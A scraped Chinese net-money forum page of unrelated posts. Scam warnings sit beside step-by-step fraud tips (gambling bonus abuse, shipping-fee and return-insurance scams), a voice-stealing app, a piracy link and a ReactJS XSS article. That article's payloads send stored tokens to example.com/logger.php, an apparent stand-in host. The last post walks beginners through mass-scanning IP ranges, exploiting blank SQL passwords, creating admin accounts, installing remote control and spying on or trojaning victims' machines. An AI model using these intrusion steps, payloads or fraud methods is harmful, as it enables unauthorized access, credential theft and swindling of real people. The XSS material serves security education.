今日:0
文章:78
今日:0
文章:13
今日:0
文章:9
今日:0
文章:139
今日:0
文章:30
今日:0
文章:63
今日:0
文章:19
今日:0
文章:0
3946
网络8个诈骗项目,谨防上当1.淘宝差评骗钱方法这个不得不说,在09年的时候火起来的,当时东哲也被勒索,反正我是不给钱,要钱没有,好在那个差评师给的是中评,损失也不大,我身边有朋友专门做这个的,我就说他赚钱你都不赚的不安心啊。人家新店做淘宝多不容易你还去勒索。不过去年的时候已然有差评师进监狱吃皇家饭了,归结一句话:出来混迟早要还的,做项目还是老老实实别投机取巧找啥诈骗项目,人在做天在看。!关于防范,就是给差评也别给钱,因为这类人得逞一次 还会有下一次,别鸟他 。他们让你加QQ 直接在淘宝和她交流,坐下证据直接投诉即可。2.QQ视频诈骗说实在的,做这个被骗,俩字 活该。为啥说活该,你大晚上不好好睡觉 找服务,不骗你骗谁,像现在 微信 陌陌很多这种了,酒托 骗钱啥的,更直接的是先打款200元 开房见面,然后发现给钱不见人,你丫活该。有八成这些都是男人伪装的小号,色字头上一把刀,说真的有时候男的特2 尤其是在那些男人伪装的小号上,平时工作认真 一被女的忽悠就把持不住。老老实实工作娶个媳妇得了。微信陌陌 引流做产品卖东西,别骗人哟,赚钱要心安。还有那些什么cps主播都是假视频,忽悠你上钩充值,10年的时候这个比较火,还有专门所谓cps团队,不过最后也有那些所谓大牛团队去吃皇家饭了。3.兼职打字这个在09年比较火热,还都上过央视的焦点访谈,在大学周边打广告的 学校各种帖,反正就是有人信,有点技术的组个小门房,弄个办公桌 给你一眼感觉是正规的,然后忽悠你,拿200押金 等你打完字 押金退你,等你没打完 人家卷钱跑路。这个在致富网赚论坛里面给大家提及过。网络上做这个的就是分类信息上 百度竞价,就是忽悠你给他们先交押金,这个纯诈骗,告诉你身边的同学 都假的 别信。4. 手机免费打电话(不算诈骗,营销的手段了)其实吧这个就搞个安卓机 里面装上一个免费打电话的软件,其实手机不值钱,最重要的一点是说在免费打电话,手机才几个钱,他们把这个能免费打电话的手机 最关键点就在这里 现在2345说吧就可以 就写这里5.赌博站 领体验金(属于一个领体验金的项目,需要自控力)你只需有一个能用的银行卡就行了!普通的银行卡!银行不限!注意注册的时候名字要和你银行卡的户名一样!否则无法取款! 钱会自动打到你的银行卡上!提钱只要 2~~3 分钟!项目思路:1.在赌博网站注册2.每个网站可以领取 18 元体验金3.想办法把每个网站的体验金都弄到一个账号上, 也就是已经注册好和领取到体验金的账号进入同一桌面一起对赌, 看下面教程: 不废话了开始赚钱的教程!注册的时候需要同时注册两个号,为什么注册两个号?游戏两个号才能让体验金进入你的银行卡帐户里面! 所以我们要去两个不同的网站申请两个账号。6. 淘宝灰色项目骗邮费下面留下这个过程,告诉你身边爱逛淘宝的朋友 别相信那些先支付宝打款的。一定要谨慎1.店铺一个,可以购买资料自己注册(注意 ps 和真实资料)2.开店3.宝贝复制专家,复制女装方面热卖的宝贝4.上传 发布宝贝5.设置价格 大多数都是 9.96.买家来了,叫他支付邮费到支付宝(这是话术的精华)7.退货师淘宝退货运费险赚钱具体操作流程: 买家在淘宝店中购买商品, 并购买运费险, 收到后使用七天无理由规则进行退货, 退货后赚取发货快递费和保险公司赔付的运费险中间的价。 比如我在安徽某个淘宝店购买 1 件商品, 花 0.5 元购买运费险, 显示退货的话保险司会承担10 元运费。而我收到货后使用某低价快递退货,从深圳发货到安徽运费只要 6 元 (部分快递甚至能做到 5 元) , 这一笔赚到的差价总共是:保险公司赔付的 10 元-0.5 元保费-5 元快递费=4.5 元。淘宝退货运费险赚钱有下面几个特点:1、只购买价促销活动最小包装的商品, 例如天天特价的 10 元包邮活动商品。这类的商品重量轻、 体积小, 便于快递和大量操作; 单价低,投入资金少,还可以避免被淘宝封号引起的资金损失;2、全新 ID 购买。退货师的 ID 多都是没有信誉的,狡兔三窟的策略。3、不咨询、不砍价,直接下;整个交易过程中不愿意沟通。4、收到货后马上退货,甚至连快递盒可能都没拆开。从正常消费者的思维来看,花 9.9 元买个东西,即使不满意,也是不愿意退货的。一是单价低根本无所谓; 二是退货也需要运费的; 三是消费者偶尔发一单快递运费可能还高于货值;四是真实购买的东西, 不可能不拆开看看。很多东西拆开后就违背了七天无理由退货中“不影响二次销售”的原则,不能再退货, 所以,当收到客户退货, 发现根本就没拆过,原封不动退回的话,十有八九就是退货师了。5、机打的快递单。部分退货师因量太,手写快递单已经无法满足需要, 使用打印机打印快递单发货。 个人消费者有针式打印机的少之又少吧?由于操作手法不同, 退货师分为好几种, 部分是笔者调查知道的, 部分是笔者亲身经历的。 笔者把他们命名分为以下三种: 规则型、暴力型、贪婪型。淘宝退货运费险目前发现有下面几种类型:1、规则型。即是笔者上述的类型,所有的流程都按照正常的交易流程。 只赚取保险司赔付款和发货运费中的价, 也是最常见的一种。2、 暴力型。这种类型是笔者调查得知的, 比较变态。比如你做 10 元包邮的活动,在计算不超重的情况下, 骗保师用 10 个不同的 ID 和地址跟你买 10 件, 达成退款协议后, 用一个包裹把 10 件商品一起快递18回来。 据说这种方式已经很少了, 由于太缺德很容易被卖家投诉;隐蔽性差,也容易被淘宝封杀。3、贪婪型。这种类型相当变态,笔者曾经经历过几次。买家的收件人、 电话、 地址全部都是假的。 这里要注意哦, 既然收货资料是假的,那买家怎么收货?既然没收到货, 怎样申请七天无理由退货?这就是重点, 买家根本就没打算收货,快递司投递 N 次无果, 货一定会返回发件方。 而买家通过跟踪物流, 发现货到其当地后, 即开始申请七天无理由退货, 明明没收到货, 但是会点击“已收到货”不满意等等为由, 申请退货。 七天无理由退货卖家是不能拒绝的, 所以卖家同意退货后, 买家会填假运单号。 而过几天后, 货也被快递司退回来了。有朋友会说, 既然货退回来了, 买家根本没收货,我也可以拒绝退款。是的, 可以拒绝退款, 这时退货师会不断留言威胁你要申请小二介入,纠纷退款对你的影响云云。但他们不会真的去申请,会一直跟你耗,耗的时间久的话,你可以看到后台卖家的“退款时间”超级超级长,我不知道这样对整店搜索权重是否有影响?我猜是有的。 另外卖家是弱势群体, 看到货也回来了, 往往会有多一事不如少一事的心理, 最后把款退给买家。有朋友又会说,那卖家可以申请小二介入啊! 是的,笔者试过, 小二不会帮你做什么, 甚至找不到对应的窗口处理! 我折腾一大圈找到的小二建议我拒绝退款, 如果拒绝后造成的差评, 可以再申诉。上面也说了,拒绝后退货师会一直耗,所以也是没用的。8.微信 QQ空间 集赞说什么 iPhone5 集齐35个赞 就送你 然后让你付15块钱邮费 先打到支付宝 然后就没有然后了,总归一句话,贪心必失
4231
名字:百变语音高仿版功能可以模仿男女的声音,可以发送音频只要把mp3的音乐文件放到根目录下的wolfman工具箱/百变语音/我的语音 即可软件自带了一点语音,请自行打开文件管理器找到wolfman工具箱/百变语音/sm.zip把sm.zip文件解压到wolfman工具箱/百变语音/我的语音 (路径)然后重新打开百变语音即可VIP会员可享受VIP功能 可永久使用盗音功能 盗音功能说明:别人在QQ发出过的语音,你都可以盗用为自己的,永久保存看到别人别人发出的语音,长按语音,弹出提示,有一个收藏,直接点击收藏,不要输入任何东西,然后再打开VIP的盗音功能即可显示被盗的语音下载地址:1_20170812114024.apk(云文件:6069KB)
4038
在发这个帖子之前我也想过,这样会不会挡了别人财路。这里我不会说他们是骗子,因为这只是一个卖暴利产品的营销系统。看到这里大家可能还不知道我在说什么。大家先看看下面的图片。(这里我只简单收集一部分,像这样的项目很多,随便到一个网赚论坛,首页的广告几乎都有,因为都是同行所以我把网站名字都给遮住了,反正就是这些类型的)想我们做网赚的人看到这些项目都会明白,要是真的你一天赚几千上万的,为什么分享出来。如果是灰色项目那自己赚钱不是更好。分享给大家不是挡自己财路吗?这个给大家说一下。你们看到的支付宝收入什么的,这些都是可以自己做的。至于怎么做大家可以百度支付宝作假。一看就明白。言归正传,我把类网站分一下类。1,教你怎么赚钱的,或者说购买教程就可以日赚几千的这里先声明他们不一定骗子,因为你花钱之后确确实实能获得一些教程或者资源什么的。只是你花多了钱而已。当你买了之后再去淘宝找找,会发现你花了比别人多好几倍的钱。而且像网赚资源,教程什么的都是暴利产品。等你买了教程之后就会发现他的方法是可以赚钱,但是觉得不是他们说的那么容易,也不会像他们说的赚那么多,你必须花很多时间和精力才能赚点钱。说不定连你购买教程的成本都赚不回来。这个现在上当的应该不是很多的。2,另外一种就是让你注册,通过推广下线获得会员权利才能获得教程或资源(这个被叫做病毒式营销,简单说就是网络界的传销)他们看起来是不让你花钱,通过推广就能获得教程。如果推广的多,卖一套教程你还能赚钱,比如599的教程,你卖一个他就分给你300元。而你的这个动作就可以帮他们宣传。以1传10,10传100的速度推广开。而这里面10%左右的人就会去购买。而你买的教程就和上面说的一样。完全是无成本的暴利产品。大家可以算算这个帐,不管你购买还是帮他推广。开网站的人永远不会亏钱。而且还会赚的很多。这个模式的网站现在非常之多。甚至有的人看重这个提成还会把他当事业去做,每天就推广,到处发广告。其实你买个源码,到淘宝买一些教程。同样可以做这样的网站。何必为别人打工呢?总之大家做网赚,既然要做就先看清楚别人是怎么盈利模式,不要看到钱就什么都肯去做。况且这只是别人给你画的一个饼,能不能赚到手还不一定
4416
居然相信这个,朋友给我说的时候我一看就知道是骗局收到货之后就是地摊货,2元一件说不定都不值,关键是你还无法分辨。虽然说人都是喜欢贪小便宜的,但是建议这种小便宜真不要去贪,以前看到一个充电宝骗局的和这个就差不多,只是别人把生意做到了微信上面,我媳妇说她朋友好多都买了。看来被骗的还是有很多人吧以前看别人计算过,货加运费5元左右,别人快递代收,净赚10元一单啊,这个绝对又是网zuan界的干活利用微信朋友圈传播,做的好一天上百单,日zuan千元有木有。吓死我的小心肝了,毕竟身边就有人信,还说便宜,无所谓╮(╯_╰)╭ 我也没办法
5852
今天给大家带来的是如何查支付宝账号的名字 俗称查支付宝实名外面有很多人卖,查一次实名多少多少钱,不要相信这些,毕竟自己动手,丰衣足食首先 登陆自己的支付宝账号登陆之后切换到 商户版 个人版不行的!我们给某个支付宝账号转账 个人版支付宝转账是看不到对方名字的只有商户版的才能看到 大家切换下就行然后我们进行转账然后我们输入想查那个支付宝的支付宝账号我这里输一个 转1分钱就行这里名字就出来了就是这么简单!
3339
今天刷微信朋友圈,看到朋友圈有人发这个,刚刚1分钟刷新的,打开就有400多人浏览了。突然觉得太牛逼了。他的公众号名字是 ,某某笑话,因为被这标题吸引本身就是一个笑话,感觉很有趣,自然就会关注他了。进去看了看历史信息。全部是100000+阅读。看来真是一个引流高手呀。看来色流依然是效率最快的。。。如果有需要引流的 不妨试试这方法 标题党引流 朋友圈 微信群太多了 这个是我见过效果最好的
2719
ReactJS是一款能够帮助开发者构建用户接口的热门JavaScript库。在它的帮助下,开发者可以构建出内容丰富的客户端或Web应用,并且提前加载内容以提供更好的用户体验。从设计角度来看,只要你能够按照开发标准来使用ReactJS的话,它其实是非常安全的。但是在网络安全领域中,没有任何东西是绝对安全的,而错误的编程实践方式将导致类似脚本注入漏洞之类的问题产生,这些错误的编程方式包括:1.利用用户提供的对象来创建React组件;2.利用用户提供的href属性来配置标签,或利用其他可注入的属性来设置其他的HTML标签(例如link标签);3.显示地设置一个元素的dangerouslySetInnerHTML属性(危险的HTML标签属性);4.向eval()传递用户提供的字符串数据; 接下来,让我们一起看一看这些潜在的问题将如何影响ReactJS应用程序,并最终导致了脚本注入漏洞的出现。组件、属性和元素在ReactJS应用程序中,组件是最基本的组成部分。从本质上来说,这些组件其实都类似于JavaScript函数,它们可以接受任意的输入数据,然后返回React元素。一个基本的ReactJS组件如下所示:class Welcome extends React.Component { render() { return <h1>Hello, {this.props.name}</h1>; } } 请注意上面代码中的return语句,这是一种JavaScript中的语句扩展(JSX)。在项目构建的过程中,JSX代码将会被编译成常规的JavaScript(ES5)代码。下面给出的两种样本代码其功能是完全相同的:// JSX const element = ( <h1 className=”greeting”> Hello, world! </h1> ); // Transpiled to createElement() call const element = React.createElement( ‘h1’, {className: ‘greeting’}, ‘Hello, world!’ ); 在创建新的React元素时,使用的是component类中的createElement()函数: React.createElement( type, [props], [...children] ) 这个函数可以接受三个参数:1.type参数:该参数可以是一个标签名(例如'div'或'span'),或一个component类。但是在React Native中只允许component类。2.props参数:该参数包含一个传递给新元素的属性列表。3.children参数:该参数包含新元素的子节点。如果你能够控制其中任何一个参数的话,那么这个参数就会变成攻击向量。注入子节点 早2015年3月份,Daniel LeCheminant报告了一个存在于HackerOne的存储型跨站脚本漏洞(XSS)。这个漏洞的成因如下:HackerOne的Web应用会将用户所提供的任意对象当作children参数传递给React.createElement()函数。根据我们的推测,存在漏洞的代码可能跟下方给出的代码比较相似:* Retrieve a user-supplied, stored value from the server and parsed it as JSON for whatever reason. attacker_supplied_value = JSON.parse(some_user_input) */ render() { return <span>{attacker_supplied_value}</span>; } 这段JSX代码将会被转译成如下所示的JavaScript代码: React.createElement("span", null, attacker_supplied_value}; 如果其中的attacker_supplied_value是一个字符串的话(正常情况),代码将会生成一个正常的span元素。但是在当前版本的ReactJS中,createElement()函数还会接受以children参数形式传递的普通对象。Daniel通过一个JSON编码的对象利用了这个漏洞,他在这个对象中包含了dangerouslySetInnerHTML属性,这将允许他向React呈现的输出效果中注入原始的HTML代码。最终的PoC代码:{ _isReactElement: true, _store: {}, type: “body”, props: { dangerouslySetInnerHTML: { __html: "<h1>Arbitrary HTML</h1> <script>alert(‘No CSP Support :(‘)</script> <a href=’http://danlec.com'>link</a>" } } } 相关的漏洞缓解方案可以在React.js的GitHub主页上找到,感兴趣的同学可以参考。在2015年11月份,Sebastian Markbåge提交了一个修复方案:为React元素引入了$$typeof: Symbol.for('react.element')属性。由于无法从一个注入对象引用全局JavaScript符号,所以Daniel设计的漏洞利用技术(注入child元素)就无法再使用了。控制元素类型 虽然我们不能再将普通对象来当作ReactJS元素来使用了,但是组件注入并非不可能实现,因为createElement()函数还可以接受type参数中的字符串数据。我们假设开发者采用了如下所示的代码:// Dynamically create an element from a string stored in the backend. element_name = stored_value; React.createElement(element_name, null); 如果stored_value是一个由攻击者控制的字符串,那我们就可以创建任意的React组件了。但是此时创建的是一个普通的无属性HTML元素,而这种东西对于攻击者来说是没有任何作用的。因此,我们必须要能够控制新创建元素的属性才可以。注入属性(props) 请大家先看看下面给出的这段代码:// Parse attacker-supplied JSON for some reason and pass // the resulting object as props. // Don't do this at home unless you are a trained expert! attacker_props = JSON.parse(stored_value) React.createElement("span", attacker_props}; 这样一来,我们就可以向新元素中注入任意属性了。我们可以使用下面给出的Payload来设置dangerouslySetInnerHTML属性:{"dangerouslySetInnerHTML" : { "__html": "<img src=x/ onerror=’alert(localStorage.access_token)’>"}} 跨站脚本漏洞某些传统的XSS攻击向量同样适用于ReactJS应用程序。请大家接着往下看:(1) 显示地设置dangerouslySetInnerHTML属性很多开发者可能会有目的地去设置dangerouslySetInnerHTML属性: <div dangerouslySetInnerHTML={user_supplied} /> 很明显,如果你能够控制这些属性的参数值,那你就能够注入任意的JavaScript代码了。(2) 可注入的属性如果你能够控制一个动态生成的标签的href属性,那就没有什么可以阻止你向其参数值中注入JavaScript代码(通过javascript:)了。除了href属性之外,在现代浏览器中HTML5按钮的formaction属性同样也是可注入的。<a href={userinput}>Link</a> <button form="name" formaction={userinput}> 另一个非常奇怪的注入向量就是HTML imports:<link rel=”import” href={user_supplied}> (3) 服务器端呈现的HTML为了降低初始化页面的呈现时间,很多开发人员会在服务器端预先加载React.JS页面(也就是所谓的“服务器端呈现”)。在2016年11月份,Emilia Smith发现官方Redux代码样本中存在一个跨站脚本漏洞(XSS),因为客户端状态被嵌入到了预呈现页面中并没有被过滤掉。(样本代码中的漏洞现在已经修复)如果HTML页面在服务器端预呈现的话,你也许可以在普通的Web应用中找到类似的跨站脚本漏洞。基于eval()的注入如果应用程序使用了eval()来动态执行一个由你控制的注入字符串,那你就非常幸运了。在这种情况下,你就可以随意选择你需要注入的代码了:function antiPattern() { eval(this.state.attacker_supplied); } XSS Payload在现代Web开发领域,很多机制的开发人员会选择使用无状态的会话令牌,并且将它们保存在客户端的本地存储中。因此,攻击者必须根据这种情况来设计相应的Payload。 当你在利用跨站脚本漏洞来攻击ReactJS Web应用程序时,你能够随意注入任意代码,如果再配合使用下面列出的代码,你就可以从目标设备的本地存储中获取访问令牌并将其发送到你的记录程序中:fetch(‘http://example.com/logger.php? token='+localStorage.access_token); React NativeReact Native是一款移动应用开发框架,它可以帮助开发人员使用ReactJS构建原生移动应用。更确切地说,它提供了一个能够再移动设备上运行React JavaScript包的运行时环境。除此之外,我们还可以使用React Native for Web让一个React Native应用在普通的Web浏览器中运行。但是就我们目前的研究结果来看,上面列出的脚本注入向量都不适用于React Native:1.React Native的createInternalComponent方法只接受包含标签的component类,所以即便是你能够完全控制传递给createElement()的参数,你野无法创建任意元素;2.不存在HTML元素,HTML代码也不会被解析,所以普通的基于浏览器的XSS向量(例如'href')就无法正常工作了。只有基于eval()的变量才可以在移动设备上被攻击者利用。如果你能够通过eval()注入JavaScript代码,你就可以访问React Native API并做一些有趣的事情了。比如说,你可以从本地存储(AsyncStorage)中窃取数据了,相关的操作代码如下所示:_reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result) {fetch(‘http://example.com/logger.php? token='+JSON.stringify(result));});}); 建议虽然从设计的角度出发,ReactJS还是非常安全的,但是这个世界上没有绝对安全的东西,不好的编程习惯将导致各种严重的安全漏洞出现: 我们建议各位开发者们不要再使用eval()函数或dangerouslySetInnerHTML属性,并避免解析用户提供的JSON数据。
3356
名字:战狼2大小:4.1GB片长: 123分钟类型: 动作,战争详情:冷锋将卷入一场非洲国家的叛乱,本可以安全撤离的他,因无法忘记军人的使命,不丢下身陷囹圄的同胞和难民们,只身犯险冲回沦陷区,带领所有被困民众向邻国大逃亡。由于百度云的下载会失效,所以发的是磁力:magnet:?xt=urn:btih:F00EC5403D70ED23B18677A110E7B55C1B10E452建议:迅雷下载。
3117
在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如何防范自己的IP泄漏 一、获取IP “IP”作为Net用户的重要标示,是黑客首先需要了解的。获取的方法较多,黑客也会因不同的网络情况采取不同的方法,如:在局域网内使用Ping指令,Ping对方在网络中的名称而获得IP;在Internet上使用IP版的QQ直接显示。而最“牛”,也是最有效的办法是截获并分析对方的网络数据包。用Windows 2003的网络监视器捕获的网络数据包,可能一般的用户比较难看懂这些16进制的代码,而对于了解网络知识的黑客,他们可以找到并直接通过软件解析截获后的数据包的IP包头信息,再根据这些信息了解具体的IP。 二、隐藏IP 虽然侦察IP的方法多样,但用户可以隐藏IP的方法同样多样。就拿对付最有效的“数据包分析方法”而言,就可以安装能够自动去掉发送数据包包头IP信息的“Norton Internet Security 2003”。不过使用“Norton Internet Security”有些缺点,譬如:它耗费资源严重,降低计算机性能;在访问一些论坛或者网站时会受影响;不适合网吧用户使用等等。 现在的个人用户采用最普及隐藏IP的方法应该是使用代理,由于使用代理服务器后,“转址服务”会对发送出去的数据包有所修改,致使“数据包分析”的方法失效。一些容易泄漏用户IP的网络软件(QQ、MSN、IE等)都支持使用代理方式连接Internet,特别是QQ使用“ezProxy”等代理软件连接后,IP版的QQ都无法显示该IP地址。这里笔者介绍一款比较适合个人用户的简易代理软件——网络新手IP隐藏器,只要在“代理服务器”和“代理服务器端”填入正确的代理服务器地址和端口,即可对http使用代理,比较适合由于IE和QQ泄漏IP的情况。 不过使用代理服务器,同样有一些缺点,如:会影响网络通讯的速度;需要网络上的一台能够提供代理能力的计算机,如果用户无法找到这样的代理服务器就不能使用代理(查找代理服务器时,可以使用“代理猎手”等工具软件扫描网络上的代理服务器)。 虽然代理可以有效地隐藏用户IP,但高深的黑客亦可以绕过代理,查找到对方的真实IP地址,用户在何种情况下使用何种方法隐藏IP,也要因情况而论。
2794
小白技术大神勿喷。1,傻瓜级入侵 之所以说这是傻瓜级,因为这个方法完全不用动脑子,并且保守的说,照这个方法,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目! 需要软件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是"开始"-"所有程序"-"附件"-"通讯"-"远程桌面连接" 不知道在哪下?用百度搜!我最不喜欢的就是当在群里我告诉别人用什么软件后,他还喋喋不休的问我"在哪下?把地址给我吧",太懒了吧,难道下载地址在我脑子里?我不也是要搜吗? 好了,下边我们开始入侵了,下边就是过程: 第一步. 打开WinntAutoAttack,就是那个手雷的标志,在"起始ip"里和"目标ip"里填上一个ip段,并且尽量把范围搞大点,比如在"起始ip"里填"218.88.1.1",在"目标ip"里填"218.88.255.255".ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾上"仅对ping检查成功的机器进行检测","检测3389端口"和"收集netbios信息" 在"IIS溢出"选项卡里勾上"开99端口shell",这个是用来开99端口telnet的,要是你不会用telnet,这个就不要勾了. 在"简单管理员密码"选项卡里勾上"列出所有密码简单的管理帐号"和"上传并安装远程图形控制软件". 在"sql漏洞"选项卡里也一样,就是把三个框都打上勾,就是"列出密码为空的sa帐号""建立系统管理员帐号(shanlu)"和"上传并安装远程图形控制软件". 好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好,太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...) ok!一切就绪!点"开始" . 接下来,接下来我们干什么呢?在qq上聊天吧,等结果吧 第二步. 时间很快就过去了,过了半个小时了吧,我们看看有没有什么结果,点"信息",把上边的"废话框"内容往下拉 主机:218.88.55.55 3389,Windows 2000 Advance Server Terminal 端口开放。 SQL漏洞: sa帐号密码为空。 建立系统管理员帐号shanlu()成功 哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我们面前了! 要是有这样的提示: 主机:218.88.55.55 3389,Windows 2000 Advance Server Terminal 端口开放。 简单管理员密码: 帐号: TsInternetUser(1234567890)[Administrators] 就说明用户名是TsInternetUser,密码是1234567890,要是括号里什么都没有,就说明密码是空,也就是说括号里的是密码,前边的是用户名.注意,帐户必须要是管理员的帐户,否则登陆不上去!"[Administrators]"告诉我们这是个管理员帐户. 要是有主机提示开了4899端口或提示"安装远程图形控制软件成功",我们就可以用Remote Administrator了!(Remote Administrator需要安装,强烈建议安装后把服务端卸载掉,方法:开始-运行,在"运行"框里填"winnt\system32\re_server.exe /uninstall",注意是"winnt"还是"windows"就看你的机器系统文件夹是什么了)卸载成功了会弹个对话框出来,说"removed successfully"要是你不卸载,最少也要在安装后给服务端装个密码,因为RA本来不是一个黑客工具,他是一个很方便的远程帮助的工具,甚至比windows自带的远程帮助工具用着还要舒服,可是,它同时也很象一个木马,有客户端和服务端,所以你要不把服务端卸载或加密码的话,很可能”螳螂捕蝉,黄鹊在后”你就成为别人攻击的目标了. 打开ra的客户端,也就是那个带红色"R"的图标,(蓝色的是服务端,不要点)提示要输注册码,一般这个下载的同时在”readme”文件里都能找到,要是找不到,我给你们一个:08le-2jgMggTuKc8bRD8VVC4O9107Hz1p7qkNUBRsGES4OdBDAnftk+ki2pQZHmM7lhysVBux8HE7udeSR0D1E0 长吧哈哈,然后把那个勾勾上,那个勾的意思是下次不再出现这个窗口(都是乱码,晕~~) 进入了RA的主界面,我们点”add new connection to the list"(建立新连接)在弹出来的窗口的两个框上都填上刚才开了4899或安装图形控制软件成功的机器的ip,点ok,看下边多出来一个小电脑的图标没?双击进去,看见什么了?是不是看见人家的屏幕了?人家在干什么你都看的清清楚楚吧哈哈! 慢!!!你干什么,别乱动他的屏幕!先看看你用的是什么模式进去的!我来给大家介绍下上边的13个按纽的作用,我就给大家介绍其中的7个常用的吧. 第2个按纽,刚才我们用过了,就是添加主机按纽 第3个按纽,删除主机 第5个按纽(中间的第一个):这个按纽最厉害!先点这个,再双击你下边肉鸡的图标进去,你不但能看见肉鸡的屏幕,还能完完全全控制他的机器!!,不信,你双击他桌面上的图标试!!或者把他正在开的窗口关了!(我怎么这么坏?)是不是就和用自己电脑一样?哈!刚开始的时候你可能不习惯这种控制,慢慢的你就会习惯了.可是,用这个要小心啊,因为你控制他电脑的动作,只要你的肉鸡前有人,他就会发现,聪明一点的,他就立即下线了,而现在的肉鸡大部分都是浮动ip,好,你这个肉鸡白找了,还没玩过瘾就没有了... 第6个按纽:只能看见屏幕,但不能控制他的电脑,适合观察他机器的动静,比如猜猜看他机器前现在有没有人啊 第7个按纽:另类的telnet功能,你用这个模式进去后,看见的就和cmd下差不多,你可以在这个下边给你的这个肉鸡加个密码,这样后来的入侵者就进不去了(当然高手还是能进去,不过他肯定要利用其他漏洞了),并且你还可以在下边做你想做的一切! 第8个按纽,进入文件夹模式.上边的是你机器的文件夹,下边的当然是他的了,你可以在这里把你机器里的木马传到他机器上,当然你要是发现他机器上有什么你想要的,也可以下下来,并且一切都在神不知鬼不觉当中(贼??)具体的做法?一个字:拖!把你的文件用鼠标左键按着拖到下边他的文件夹上松开是上传,反过来就是下载了)方便吧? 第9个按纽,可以远程给他关机,重起什么的,怎么做不要我说了吧?RA 真的很好用,爽! 第3步:要是出现这样: 主机:218.88.55.55 SQL漏洞: sa帐号密码为空。 建立系统管理员帐号(shanlu)成功。 这说明我们可以用SQL漏洞了,看见WinntAutoAttack的那个“SQLCMD执行”的选项卡没有?点它。 在“主机”后边输入ip,其他的不动,点“连接”,出现了“连接到主机:218.88.55.55”这个时候你点下“执行”(默认的执行"dir c:\"),他的c盘文件是不是在你面前了?比如在下边执行“net start telnet”就是把它的telnet打开,然后开个cmd窗口,用刚才的管理员帐号"shanlu"telnet上去吧!具体怎么做,我在下个文章里讲ipc$的时候再讲。 其实,这个是完完全全骇客的做法,时间长了,你就会发现,这样做一点意思也没有,渐渐的你就失去了当初的那种成就感,毕竟,在这个过程中,当你把过程摸熟了,整个入侵过程你不用用一点脑筋,不过,刚开始这么干还是有好处的,它会增加你的信心,并且,有的时候你可能会遇到一些问题,这样,你就可以慢慢的掌握一点入侵的知识了.